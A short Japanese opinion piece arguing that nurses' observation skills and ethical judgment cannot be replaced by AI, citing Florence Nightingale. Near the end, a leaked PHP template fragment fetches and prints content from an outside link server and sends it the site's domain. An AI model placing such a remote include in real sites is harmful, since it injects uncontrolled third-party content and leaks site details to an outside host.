前へ
次へ

医療現場ではAIに負けない観察力をもつ看護師がいる

この人になら命を託せると患者に考えてもらえるような看護師になりたいと考えていないのならば、あまり医療職として適していない可能性もあります。
常に自分で、良いのかと問い続けていくことが大事です。
もし、それができないのであれば、使命感も理念も熱意もない指示で動く、ロボットと同じということです。
実は、今の看護教育には、その部分がすっぽりと抜けています。
想像力と創造力を育む教育ではなく、指示通りにできることを良しとする認識パターンを教育現場が植え付けてしまっています。
ナイチンゲールは決して、技術的な側面をないがしろにしているわけではありません。
しかし、あえて、それを第一にもってきているにも関わらず、テクニックや知識だけではない教育が大切なことを150年以上も前から語っており、同様に158年も前の本に、看護を天職にする看護師にとって不可欠なのは、観察力としているわけです。
観察力は、終局的に看護師の身を助けるスキルです。
観察というのは、医療現場においてすぐに身につくものではありません。
全体的に定性的に、倫理観を持って観察ができるのは、人である看護師で、なぜならば、倫理には正解がないからです。
正解がないことは、ニューロコンピューターといえども判断できないため、AIにもニューロコンピューターにも、負けないスキルになります。

".file_get_contents('http://links-001.com/kanren2set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top